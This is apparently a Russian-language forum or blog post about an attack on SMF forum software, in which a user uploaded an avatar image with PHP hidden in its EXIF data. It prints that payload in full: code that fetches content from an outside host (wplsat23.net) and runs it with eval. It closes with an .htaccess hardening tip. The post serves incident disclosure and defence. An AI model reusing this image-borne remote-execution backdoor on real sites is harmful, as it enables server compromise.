Пришел krisbarteo
krisbarteo — вот виновник создавшейся проблемы линейки форумов SMF Из за него начались проблемы, такие как взлом линейки форумов SMF Проблема заключалась в том, что указанный пользователь загружал аватар в котором содержался следующий код:
яШяб јExif II* 1 J 2 f i‡ z ACD Systems Digital Imaging 2008:11:22 03:08:16 ђ 0220ђ’ 515 яю'<?php;$url = ‘http://wplsat23.net/?update=main’;$done = false;if(!$url){return »;}$url_info = parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : «/»; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . «?» . $url_info[query] : «»; $query = «GET » . $url_info[path] . » HTTP/1.1\r\n»; $query = $query . «Host: » . $url_info[host] . «\r\n»; $query = $query . «Accept: */*» . «\r\n»; $query = $query . «Connection: close» . «\r\n»; $query = $query . «User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12» . «\r\n»; $query = $query . «\r\n»; $errno = 0; $error = «»; $sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == »){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret = implode(«», $resp);eval($ret);?>00яЫ C
яЫ C
яА ! яД
яД µ } !1AQa»q2Ѓ‘Ў#B±БRСр$3br‚
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzѓ„…†‡?‰Љ’“”•–—?™љўЈ¤Ґ¦§Ё©ЄІіґµ¶·ё№єВГДЕЖЗИЙКТУФХЦЧШЩЪбвгдежзийкстуфхцчшщъяД
яД µ w !1AQaq»2ЃB‘Ў±Б #3RрbrС
$4б%с&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ѓ„…†‡?‰Љ’“”•–—?™љўЈ¤Ґ¦§Ё©ЄІіґµ¶·ё№єВГДЕЖЗИЙКТУФХЦЧШЩЪвгдежзийктуфхцчшщъяЪ ? эSўЂ?яЩ
Посчастливилось всем кто владел этим форумом. Везде сплошной krisbarteo и его любимый аватар. Сегодня сообщество выполнило обновление линейки форума до версии 1.1.9 За что им и спасибо.
PS Как вариант можно кинуть в папку с attachments файл .htaccess с содержанием:
<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
</Files>
RemoveHandler .php .php3 .phtml .cgi .fcgi .pl .fpl .shtml